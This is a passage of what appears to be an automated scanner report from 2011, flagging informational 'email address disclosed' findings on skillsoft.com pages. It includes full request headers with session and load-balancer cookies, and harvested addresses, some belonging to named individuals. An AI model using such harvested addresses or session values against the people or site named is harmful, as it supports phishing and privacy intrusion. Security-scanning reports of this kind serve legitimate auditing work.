Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a target="_blank" href="mailto:Donna_Ayer@SkillSoft.com">Donna_Ayer@SkillSoft.com</a>
...[SNIP]...
<a target="_blank" href="mailto:lauren_whittenberg@lpp.com">lauren_whittenberg@lpp.com</a>
...[SNIP]...

5.6. http://skillsoft.com/careers/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /careers/default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5148
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-en" xml:lang="en-en" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href="mailto:recruiter@skillsoft.com">recruiter@skillsoft.com</a>
...[SNIP]...

5.7. http://skillsoft.com/privacy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /privacy.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /privacy.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48303
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:skillsoft_optout@skillsoft.com">skillsoft_optout@skillsoft.com</a>
...[SNIP]...
<a href="mailto:support@skillsoft.com">support@skillsoft.com</a>
...[SNIP]...

5.8. http://skillsoft.com/products/live_learning/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/live_learning/default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /products/live_learning/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51184
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:livelearning@skillsoft.com" title="livelearning@skillsoft.com">
...[SNIP]...

5.9. http://skillsoft.com/terms.asp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /terms.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /terms.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50258
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:support@SkillSoft.com" title="mailto:support@SkillSoft.com">support@SkillSoft.com</a>
...[SNIP]...
<a href="mailto:support@SkillSoft.com" title="mailto:support@SkillSoft.com">support@SkillSoft.com</a>
...[SNIP]...

Report generated by XSS.CX at Mon Jan 03 07:17:25 CST 2011.